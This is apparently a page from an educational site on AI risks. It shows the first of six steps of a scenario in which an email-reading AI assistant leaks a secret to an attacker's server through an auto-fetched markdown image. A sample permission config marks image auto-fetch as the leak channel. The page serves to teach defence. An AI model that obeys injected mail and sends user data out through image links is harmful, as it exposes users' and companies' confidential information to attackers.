πŸ”AI RiskAtlas
← Scenario library

Zero-Click Leak by Picture

An inbox summary quietly ships a secret to an attacker's server

Technique first revealed 29 Mar 2023

Tool-Using Agent
UntrustedAgent coreOversightThe real worldgoalscopesπŸ§‘UserπŸŽ›οΈOrchestrator /Agent Loop🧠LLMπŸ”Identity &PermissionsπŸ”§Tool Runtimeβœ‹Human ApprovalGateπŸ”ŒExternal APIsπŸ—„οΈBusinessDatabase🌐UntrustedContentπŸ“Audit Logging🌐Attacker email🌐Attacker server
InstructionsDataActionsControl / decisionFeedback / logs
πŸ‘† Click a component to inspect
SetupStep 1 / 6

The assistant can read your mail

A company gives every employee an AI assistant that can read their email and documents so it can help draft replies and answer questions. That access is the whole point β€” and also the prize an attacker wants to reach.

βš™οΈAgent permission scopesconfig
agent_identity: copilot-user-delegate
scopes:
  - mail.read        # full inbox, incl. attacker-sent mail
  - files.read       # docs, incl. secrets in context
  - chat.compose     # may emit markdown to the client UI
output_render:
  markdown: enabled
  images: AUTO-FETCH        # <-- the channel that matters
  link_allowlist: (none)

AI RiskAtlas is an educational model of how GenAI & agentic systems work and fail. Architectures and payloads are illustrative and simplified for learning β€” not operational guidance. Real-world cases are summarised from public reporting.

Sources & further reading β†’Β·Built by Shi Yuan β†—